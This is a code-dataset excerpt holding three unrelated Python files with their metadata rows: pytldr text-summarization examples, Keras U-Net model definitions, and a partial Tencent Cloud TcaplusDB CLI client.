"""
В модуль встроен свой sentence-tokenizer
Tokenizer выполняет stemming в нескольких языках также хорошо, как удаление стоп-слов
Можно указать свой собственный лист стоп-слов
При этом, токенайзер указывается один раз, при создании сокращателя
>> LsaSummarizer(tokenizer) и аналогично
Примечание: поскольку алгоритмы экстрактивные, токенайзер не удаляет сам слова (как потестил)
Но определенно, количество стоп слов влияют на ранжирование важности предложений
"""
from pytldr.nlp.tokenizer import Tokenizer
from pytldr.summarize.lsa import LsaSummarizer
stopwords = ["the", "a", "but", " she", "said"]
tokenizer = Tokenizer(language='english', stopwords=stopwords, stemming=True)
# Note that if stopwords=None then the tokenizer loads stopwords from a bundled data-set
# You can alternatively specify a text file or provide a list of words
txt = """
Hello! I just finished interviewing with Google and wanted to quickly catch you up on some interesting and frustrating steps of the process so that you can understand what to expect from Google interviews and the steps involved. I will also share some tips on how to prepare for the interview and mistakes to avoid. If you’re looking for a success story, this is the wrong post for you. I actually failed the interviewing process, but the whole experience was pretty interesting for me and leads me on to another stage of my career. I will share more details on this at the end of the post. All names and identifying details have been changed to protect the privacy of Google employees. Initial screening interview. My story starts on a rainy October morning. I received a message from Olivia, a Google recruiter, with the subject «Interested in solving high-impact engineering problems at Google?». At that moment in time I had recently finished several projects and was looking for new challenges. Working at Google seemed like a good opportunity that I didn’t want to miss, so I quickly responded, «Yes, definitely» and booked an appointment via Google Hangouts. Our chat took place two days later via Hangouts. Olivia told me how exciting it is to work at Google, and what the hiring process looks like. When I asked about the details of the position, she told me that they were looking for someone for their new office in Warsaw, Poland, to support and develop Google Cloud functions for enterprise customers. I asked about the exact responsibilities that would come under my remit, and the team I would be part of, but she said it didn’t matter at that stage – I could select the desired team and position later on when all steps of the interview process were completed. That was frustrating moment #1 for me, but I decided that it was worth persevering. Frustrating moment #1. What if there was no team at Google that I would like to join? From what Olivia told me, the interviewing process at Google comprises three stages: first of all, there are two remote coding interviews on algo and data structures. If you’re extraordinary, you might just have one interview, but for an average software engineer it will be two. The next stage is an on-site interview in one of the Google offices, which includes several coding interviews (again!), a system design interview, and last but not least, ‘Googleyness and Leadership’. The last one detects how well you’ll fit into the company. Tip #1. The Google interviewing process is difficult and will take up several weeks of your life. You need to go all-in to prepare for it.
"""
[print(s) for s in LsaSummarizer(tokenizer).summarize(txt)]
def example_3():
"""
TextRank Summarization
`Ranks sentences` используют PageRank алгоритм,
где `votes` или `in-links` представлены словами, распределенными между предложениями
"""
from pytldr.summarize.textrank import TextRankSummarizer
from pytldr.nlp.tokenizer import Tokenizer
tokenizer = Tokenizer('english')
summarizer = TextRankSummarizer(tokenizer)
# If you don't specify a tokenizer when intiializing a summarizer then the
# English tokenizer will be used by default
summarizer = TextRankSummarizer() # English tokenizer used
# This object creates a summary using the summarize method:
# e.g. summarizer.summarize(text, length=5, weighting='frequency', norm=None)
# The length parameter specifies the length of the summary, either as a
# number of sentences, or a percentage of the original text
summary = summarizer.summarize("Some long article ...", length=4)
print(summary)
def example_4():
"""
Latent Semantic Analysis (LSA) Summarization
Уменьшает размерность статьи используя несколько "тематических" кластеров, используя разлоение по сингулярным значениям
и выбирает предложения, наиболее соответствующие этим темам
Этот модуль поставляется с двумя различными реализациями, соответственно, двум научным статьям:
J. Steinberger and K. Jezek (2004). Using latent semantic analysis in text summarization and summary evaluation.
Ozsoy, M., Alpaslan, F., and Cicekli, I. (2011). Text summarization using latent semantic analysis.
По умолчанию вызывается наиболее поздний (Ozsoy), но у них одинаковые интерфейсы
"""
from pytldr.summarize.lsa import LsaSummarizer, LsaOzsoy, LsaSteinberger
text = """
Hello! I just finished interviewing with Google and wanted to quickly catch you up on some interesting and frustrating steps of the process so that you can understand what to expect from Google interviews and the steps involved. I will also share some tips on how to prepare for the interview and mistakes to avoid. If you’re looking for a success story, this is the wrong post for you. I actually failed the interviewing process, but the whole experience was pretty interesting for me and leads me on to another stage of my career. I will share more details on this at the end of the post. All names and identifying details have been changed to protect the privacy of Google employees. Initial screening interview. My story starts on a rainy October morning. I received a message from Olivia, a Google recruiter, with the subject «Interested in solving high-impact engineering problems at Google?». At that moment in time I had recently finished several projects and was looking for new challenges. Working at Google seemed like a good opportunity that I didn’t want to miss, so I quickly responded, «Yes, definitely» and booked an appointment via Google Hangouts. Our chat took place two days later via Hangouts. Olivia told me how exciting it is to work at Google, and what the hiring process looks like. When I asked about the details of the position, she told me that they were looking for someone for their new office in Warsaw, Poland, to support and develop Google Cloud functions for enterprise customers. I asked about the exact responsibilities that would come under my remit, and the team I would be part of, but she said it didn’t matter at that stage – I could select the desired team and position later on when all steps of the interview process were completed. That was frustrating moment #1 for me, but I decided that it was worth persevering. Frustrating moment #1. What if there was no team at Google that I would like to join? From what Olivia told me, the interviewing process at Google comprises three stages: first of all, there are two remote coding interviews on algo and data structures. If you’re extraordinary, you might just have one interview, but for an average software engineer it will be two. The next stage is an on-site interview in one of the Google offices, which includes several coding interviews (again!), a system design interview, and last but not least, ‘Googleyness and Leadership’. The last one detects how well you’ll fit into the company. Tip #1. The Google interviewing process is difficult and will take up several weeks of your life. You need to go all-in to prepare for it.
"""
summarizer = LsaOzsoy()
summarizer = LsaSteinberger()
summarizer = LsaSummarizer() # This is identical to the LsaOzsoy object
summary = summarizer.summarize(
text, topics=4, length=5, binary_matrix=True, topic_sigma_threshold=0.5
)
print(summary)
# topics specifies the number of topics to cluster the article into.
# topic_sigma_threshold removes all topics with a singular value less than a given
# percentage of the largest singular value.
def example_5():
"""
Relevance Score Summarization
Этот метод вычисляет и ранжирует предложения по `cosine similarity` через вектор предложения и весь документ,
удаляя наиболее релевантное предложение на каждой итерации.
Этот подход близко описан в работе:
Y. Gong and X. Liu (2001). Generic text summarization using relevance measure and latent semantic analysis.
"""
from pytldr.summarize.relevance import RelevanceSummarizer
text = """
Hello! I just finished interviewing with Google and wanted to quickly catch you up on some interesting and frustrating steps of the process so that you can understand what to expect from Google interviews and the steps involved. I will also share some tips on how to prepare for the interview and mistakes to avoid. If you’re looking for a success story, this is the wrong post for you. I actually failed the interviewing process, but the whole experience was pretty interesting for me and leads me on to another stage of my career. I will share more details on this at the end of the post. All names and identifying details have been changed to protect the privacy of Google employees. Initial screening interview. My story starts on a rainy October morning. I received a message from Olivia, a Google recruiter, with the subject «Interested in solving high-impact engineering problems at Google?». At that moment in time I had recently finished several projects and was looking for new challenges. Working at Google seemed like a good opportunity that I didn’t want to miss, so I quickly responded, «Yes, definitely» and booked an appointment via Google Hangouts. Our chat took place two days later via Hangouts. Olivia told me how exciting it is to work at Google, and what the hiring process looks like. When I asked about the details of the position, she told me that they were looking for someone for their new office in Warsaw, Poland, to support and develop Google Cloud functions for enterprise customers. I asked about the exact responsibilities that would come under my remit, and the team I would be part of, but she said it didn’t matter at that stage – I could select the desired team and position later on when all steps of the interview process were completed. That was frustrating moment #1 for me, but I decided that it was worth persevering. Frustrating moment #1. What if there was no team at Google that I would like to join? From what Olivia told me, the interviewing process at Google comprises three stages: first of all, there are two remote coding interviews on algo and data structures. If you’re extraordinary, you might just have one interview, but for an average software engineer it will be two. The next stage is an on-site interview in one of the Google offices, which includes several coding interviews (again!), a system design interview, and last but not least, ‘Googleyness and Leadership’. The last one detects how well you’ll fit into the company. Tip #1. The Google interviewing process is difficult and will take up several weeks of your life. You need to go all-in to prepare for it.
"""
summarizer = RelevanceSummarizer()
summary = summarizer.summarize(text, length=5, binary_matrix=True)
print(summary)
if __name__ == '__main__':
"""
Не забываем о:
help(TextRankSummarizer)
help(LsaSummarizer)
help(RelevanceSummarizer)
"""
# example_1()
# example_2()
# example_3()
# example_4()
example_5()
| 107.165517 | 2,629 | 0.768711 | 2,440 | 15,539 | 4.893852 | 0.189344 | 0.009631 | 0.0067 | 0.009379 | 0.749435 | 0.738799 | 0.708316 | 0.708316 | 0.708316 | 0.708316 | 0 | 0.004432 | 0.18682 | 15,539 | 144 | 2,630 | 107.909722 | 0.938984 | 0.168865 | 0 | 0.355932 | 0 | 0.067797 | 0.847966 | 0.001665 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084746 | false | 0 | 0.152542 | 0 | 0.237288 | 0.101695 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
69d22958c82c29c910af12a2b71fe4b6e34aaba3 | 12,673 | py | Python | python/photographic_mc_U_Net/MyUnet.py | billy000400/Mu2e_MLTracking | 675e62d844ff8a5ccba9019e316c374c40658101 | [
"MIT"
] | null | null | null | python/photographic_mc_U_Net/MyUnet.py | billy000400/Mu2e_MLTracking | 675e62d844ff8a5ccba9019e316c374c40658101 | [
"MIT"
] | 1 | 2021-01-03T08:57:34.000Z | 2021-01-03T23:41:22.000Z | python/photographic_mc_U_Net/MyUnet.py | billy000400/Mu2e_MLTracking | 675e62d844ff8a5ccba9019e316c374c40658101 | [
"MIT"
] | null | null | null | ## A U-Net architecture for semantic image segmentation.
#
# No dense block is applied. Multiple inputs using "concatenate" instead of "add."
# Padding startegey is "same" instead of "valid."
# Using Conv2d transpose instead of upsampling2D
from tensorflow import keras
from tensorflow.keras import Model, initializers
from tensorflow.keras.layers import *
## A U-Net architecture for semantic image segmentation.
#
# No dense block is applied. Multiple inputs using "concatenate" instead of "add."
class U_Net:
def __init__(self, input_shape, num_class, shrink_times=3):
if len(input_shape) == 2:
try:
self.input_shape = input_shape + (1,)
except:
self.input_shape = input_shape + [1]
elif len(input_shape) == 3:
self.input_shape = input_shape
else:
perr("Invalid Input Shape")
self.num_class = num_class
self.shrink_times = shrink_times
def get_model(self):
init = initializers.RandomNormal(stddev=0.01)
input = Input(self.input_shape)
conv1 = Conv2D(64, 3, padding='same', kernel_initializer=init)(input)
conv1 = BatchNormalization()(conv1)
conv1 = Activation('relu')(conv1)
conv1 = Conv2D(64, 3, padding='same', kernel_initializer=init)(conv1)
conv1 = BatchNormalization()(conv1)
conv1 = Activation('relu')(conv1)
pool1 = MaxPooling2D(pool_size=(2,2))(conv1)
conv2 = Conv2D(128, 3, padding='same', kernel_initializer=init)(pool1)
conv2 = BatchNormalization()(conv2)
conv2 = Activation('relu')(conv2)
conv2 = Conv2D(128, 3, padding='same', kernel_initializer=init)(conv2)
conv2 = BatchNormalization()(conv2)
conv2 = Activation('relu')(conv2)
pool2 = MaxPooling2D(pool_size=(2,2))(conv2)
conv3 = Conv2D(256, 3, padding='same', kernel_initializer=init)(pool2)
conv3 = BatchNormalization()(conv3)
conv3 = Activation('relu')(conv3)
conv3 = Conv2D(256, 3, padding='same', kernel_initializer=init)(conv3)
conv3 = BatchNormalization()(conv3)
conv3 = Activation('relu')(conv3)
pool3 = MaxPooling2D(pool_size=(2,2))(conv3)
conv4 = Conv2D(512, 3, padding='same', kernel_initializer=init)(pool3)
conv4 = BatchNormalization()(conv4)
conv4 = Activation('relu')(conv4)
conv4 = Conv2D(512, 3, padding='same', kernel_initializer=init)(conv4)
conv4 = BatchNormalization()(conv4)
conv4 = Activation('relu')(conv4)
pool4 = MaxPooling2D(pool_size=(2,2))(conv4)
conv5 = Conv2D(1024, 3, padding='same', kernel_initializer=init)(pool4)
conv5 = BatchNormalization()(conv5)
conv5 = Activation('relu')(conv5)
conv5 = Conv2D(1024, 3, padding='same', kernel_initializer=init)(conv5)
conv5 = BatchNormalization()(conv5)
conv5 = Activation('relu')(conv5)
upconv1 = Conv2DTranspose(512, kernel_size=(2,2), strides=(2,2), padding='valid', kernel_initializer=init)(conv5)
upconv1 = BatchNormalization()(upconv1)
upconv1 = Activation('relu')(upconv1)
merge1 = concatenate([upconv1, conv4], axis=3)
conv6 = Conv2D(512, 3, padding='same', kernel_initializer=init)(merge1)
conv6 = BatchNormalization()(conv6)
conv6 = Activation('relu')(conv6)
conv6 = Conv2D(512, 3, padding='same', kernel_initializer=init)(conv6)
conv6 = BatchNormalization()(conv6)
conv6 = Activation('relu')(conv6)
upconv2 = Conv2DTranspose(256, kernel_size=(2,2), strides=(2,2), padding='valid', kernel_initializer=init)(conv6)
upconv2 = BatchNormalization()(upconv2)
upconv2 = Activation('relu')(upconv2)
merge2 = concatenate([upconv2, conv3], axis=3)
conv7 = Conv2D(256, 3, padding='same', kernel_initializer=init)(merge2)
conv7 = BatchNormalization()(conv7)
conv7 = Activation('relu')(conv7)
conv7 = Conv2D(256, 3, padding='same', kernel_initializer=init)(conv7)
conv7 = BatchNormalization()(conv7)
conv7 = Activation('relu')(conv7)
upconv3 = Conv2DTranspose(128, kernel_size=(2,2), strides=(2,2), padding='valid', kernel_initializer=init)(conv7)
upconv3 = BatchNormalization()(upconv3)
upconv3 = Activation('relu')(upconv3)
merge3 = concatenate([upconv3, conv2],axis=3)
conv8 = Conv2D(128, 3, padding='same', kernel_initializer=init)(merge3)
conv8 = BatchNormalization()(conv8)
conv8 = Activation('relu')(conv8)
conv8 = Conv2D(128, 3, padding='same', kernel_initializer=init)(conv8)
conv8 = BatchNormalization()(conv8)
conv8 = Activation('relu')(conv8)
upconv4 = Conv2DTranspose(64, kernel_size=(2,2), strides=(2,2), padding='valid', kernel_initializer=init)(conv8)
upconv4 = BatchNormalization()(upconv4)
upconv4 = Activation('relu')(upconv4)
merge4 = concatenate([upconv4, conv1],axis=3)
conv9 = Conv2D(64, 3, padding='same', kernel_initializer=init)(merge4)
conv9 = BatchNormalization()(conv9)
conv9 = Activation('relu')(conv9)
conv9 = Conv2D(64, 3, padding='same', kernel_initializer=init)(conv9)
conv9 = BatchNormalization()(conv9)
conv9 = Activation('relu')(conv9)
output = Conv2D(self.num_class, 1, activation='softmax', padding='same', kernel_initializer=init)(conv9)
model = Model(input, output)
return model
class U_Net_3:
def __init__(self, input_shape, num_class, shrink_times=3):
if len(input_shape) == 2:
try:
self.input_shape = input_shape + (1,)
except:
self.input_shape = input_shape + [1]
elif len(input_shape) == 3:
self.input_shape = input_shape
else:
perr("Invalid Input Shape")
self.num_class = num_class
self.shrink_times = shrink_times
def get_model(self):
init = initializers.RandomNormal(stddev=0.01)
input = Input(self.input_shape)
conv1 = Conv2D(64, 3, padding='same', kernel_initializer=init)(input)
conv1 = BatchNormalization()(conv1)
conv1 = Activation('relu')(conv1)
conv1 = Conv2D(64, 3, padding='same', kernel_initializer=init)(conv1)
conv1 = BatchNormalization()(conv1)
conv1 = Activation('relu')(conv1)
pool1 = MaxPooling2D(pool_size=(2,2))(conv1)
conv2 = Conv2D(128, 3, padding='same', kernel_initializer=init)(pool1)
conv2 = BatchNormalization()(conv2)
conv2 = Activation('relu')(conv2)
conv2 = Conv2D(128, 3, padding='same', kernel_initializer=init)(conv2)
conv2 = BatchNormalization()(conv2)
conv2 = Activation('relu')(conv2)
pool2 = MaxPooling2D(pool_size=(2,2))(conv2)
conv3 = Conv2D(256, 3, padding='same', kernel_initializer=init)(pool2)
conv3 = BatchNormalization()(conv3)
conv3 = Activation('relu')(conv3)
conv3 = Conv2D(256, 3, padding='same', kernel_initializer=init)(conv3)
conv3 = BatchNormalization()(conv3)
conv3 = Activation('relu')(conv3)
upconv1 = Conv2DTranspose(128, kernel_size=(2,2), strides=(2,2), padding='valid', kernel_initializer=init)(conv3)
upconv1 = BatchNormalization()(upconv1)
upconv1 = Activation('relu')(upconv1)
merge1 = concatenate([upconv1, conv2], axis=3)
conv4 = Conv2D(128, 3, padding='same', kernel_initializer=init)(merge1)
conv4 = BatchNormalization()(conv4)
conv4 = Activation('relu')(conv4)
conv4 = Conv2D(128, 3, padding='same', kernel_initializer=init)(conv4)
conv4 = BatchNormalization()(conv4)
conv4 = Activation('relu')(conv4)
upconv2 = Conv2DTranspose(64, kernel_size=(2,2), strides=(2,2), padding='valid', kernel_initializer=init)(conv4)
upconv2 = BatchNormalization()(upconv2)
upconv2 = Activation('relu')(upconv2)
merge2 = concatenate([upconv2, conv1], axis=3)
conv5 = Conv2D(64, 3, padding='same', kernel_initializer=init)(merge2)
conv5 = BatchNormalization()(conv5)
conv5 = Activation('relu')(conv5)
conv5 = Conv2D(64, 3, padding='same', kernel_initializer=init)(conv5)
conv5 = BatchNormalization()(conv5)
conv5 = Activation('relu')(conv5)
output = Conv2D(self.num_class, 1, activation='softmax', padding='same', kernel_initializer=init)(conv5)
model = Model(input, output)
return model
class U_Net_4:
def __init__(self, input_shape, num_class, shrink_times=3):
if len(input_shape) == 2:
try:
self.input_shape = input_shape + (1,)
except:
self.input_shape = input_shape + [1]
elif len(input_shape) == 3:
self.input_shape = input_shape
else:
perr("Invalid Input Shape")
self.num_class = num_class
self.shrink_times = shrink_times
def get_model(self):
init = initializers.RandomNormal(stddev=0.01)
input = Input(self.input_shape)
conv1 = Conv2D(64, 3, padding='same', kernel_initializer=init)(input)
conv1 = BatchNormalization()(conv1)
conv1 = Activation('relu')(conv1)
conv1 = Conv2D(64, 3, padding='same', kernel_initializer=init)(conv1)
conv1 = BatchNormalization()(conv1)
conv1 = Activation('relu')(conv1)
pool1 = MaxPooling2D(pool_size=(2,2))(conv1)
conv2 = Conv2D(128, 3, padding='same', kernel_initializer=init)(pool1)
conv2 = BatchNormalization()(conv2)
conv2 = Activation('relu')(conv2)
conv2 = Conv2D(128, 3, padding='same', kernel_initializer=init)(conv2)
conv2 = BatchNormalization()(conv2)
conv2 = Activation('relu')(conv2)
pool2 = MaxPooling2D(pool_size=(2,2))(conv2)
conv3 = Conv2D(256, 3, padding='same', kernel_initializer=init)(pool2)
conv3 = BatchNormalization()(conv3)
conv3 = Activation('relu')(conv3)
conv3 = Conv2D(256, 3, padding='same', kernel_initializer=init)(conv3)
conv3 = BatchNormalization()(conv3)
conv3 = Activation('relu')(conv3)
pool3 = MaxPooling2D(pool_size=(2,2))(conv3)
conv4 = Conv2D(512, 3, padding='same', kernel_initializer=init)(pool3)
conv4 = BatchNormalization()(conv4)
conv4 = Activation('relu')(conv4)
conv4 = Conv2D(512, 3, padding='same', kernel_initializer=init)(conv4)
conv4 = BatchNormalization()(conv4)
conv4 = Activation('relu')(conv4)
upconv1 = Conv2DTranspose(256, kernel_size=(2,2), strides=(2,2), padding='valid', kernel_initializer=init)(conv4)
upconv1 = BatchNormalization()(upconv1)
upconv1 = Activation('relu')(upconv1)
merge1 = concatenate([upconv1, conv3], axis=3)
conv5 = Conv2D(256, 3, padding='same', kernel_initializer=init)(merge1)
conv5 = BatchNormalization()(conv5)
conv5 = Activation('relu')(conv5)
conv5 = Conv2D(256, 3, padding='same', kernel_initializer=init)(conv5)
conv5 = BatchNormalization()(conv5)
conv5 = Activation('relu')(conv5)
upconv2 = Conv2DTranspose(128, kernel_size=(2,2), strides=(2,2), padding='valid', kernel_initializer=init)(conv5)
upconv2 = BatchNormalization()(upconv2)
upconv2 = Activation('relu')(upconv2)
merge2 = concatenate([upconv2, conv2], axis=3)
conv6 = Conv2D(128, 3, padding='same', kernel_initializer=init)(merge2)
conv6 = BatchNormalization()(conv6)
conv6 = Activation('relu')(conv6)
conv6 = Conv2D(128, 3, padding='same', kernel_initializer=init)(conv6)
conv6 = BatchNormalization()(conv6)
conv6 = Activation('relu')(conv6)
upconv3 = Conv2DTranspose(64, kernel_size=(2,2), strides=(2,2), padding='valid', kernel_initializer=init)(conv6)
upconv3 = BatchNormalization()(upconv3)
upconv3 = Activation('relu')(upconv3)
merge3 = concatenate([upconv3, conv1], axis=3)
conv7 = Conv2D(128, 3, padding='same', kernel_initializer=init)(merge3)
conv7 = BatchNormalization()(conv7)
conv7 = Activation('relu')(conv7)
conv7 = Conv2D(128, 3, padding='same', kernel_initializer=init)(conv7)
conv7 = BatchNormalization()(conv7)
conv7 = Activation('relu')(conv7)
output = Conv2D(self.num_class, 1, activation='softmax', padding='same', kernel_initializer=init)(conv7)
model = Model(input, output)
return model
| 41.415033 | 121 | 0.63655 | 1,384 | 12,673 | 5.725434 | 0.072254 | 0.115851 | 0.14311 | 0.159011 | 0.939172 | 0.936396 | 0.929833 | 0.899041 | 0.899041 | 0.749621 | 0 | 0.070692 | 0.22757 | 12,673 | 305 | 122 | 41.55082 | 0.738788 | 0.028722 | 0 | 0.78355 | 0 | 0 | 0.041226 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025974 | false | 0 | 0.012987 | 0 | 0.064935 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
386f701df4c1b0511e5e6ea86d6576e5d656f97f | 55,178 | py | Python | tccli/services/tcaplusdb/tcaplusdb_client.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/tcaplusdb/tcaplusdb_client.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/tcaplusdb/tcaplusdb_client.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli.nice_command import NiceCommand
import tccli.error_msg as ErrorMsg
import tccli.help_template as HelpTemplate
from tccli import __version__
from tccli.utils import Utils
from tccli.configure import Configure
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.tcaplusdb.v20190823 import tcaplusdb_client as tcaplusdb_client_v20190823
from tencentcloud.tcaplusdb.v20190823 import models as models_v20190823
from tccli.services.tcaplusdb import v20190823
from tccli.services.tcaplusdb.v20190823 import help as v20190823_help
def doDescribeTableTags(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeTableTags", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTableTagsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeTableTags(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTableTags(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyTableTags", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
"ReplaceTags": Utils.try_to_json(argv, "--ReplaceTags"),
"DeleteTags": Utils.try_to_json(argv, "--DeleteTags"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTableTagsRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyTableTags(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateCluster(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateCluster", g_param[OptionsDefine.Version])
return
param = {
"IdlType": argv.get("--IdlType"),
"ClusterName": argv.get("--ClusterName"),
"VpcId": argv.get("--VpcId"),
"SubnetId": argv.get("--SubnetId"),
"Password": argv.get("--Password"),
"ResourceTags": Utils.try_to_json(argv, "--ResourceTags"),
"Ipv6Enable": Utils.try_to_json(argv, "--Ipv6Enable"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateClusterRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateCluster(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeUinInWhitelist(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeUinInWhitelist", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeUinInWhitelistRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeUinInWhitelist(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTablesInRecycle(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeTablesInRecycle", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTablesInRecycleRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeTablesInRecycle(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRollbackTables(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("RollbackTables", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
"RollbackTime": argv.get("--RollbackTime"),
"Mode": argv.get("--Mode"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RollbackTablesRequest()
model.from_json_string(json.dumps(param))
rsp = client.RollbackTables(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyClusterName(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
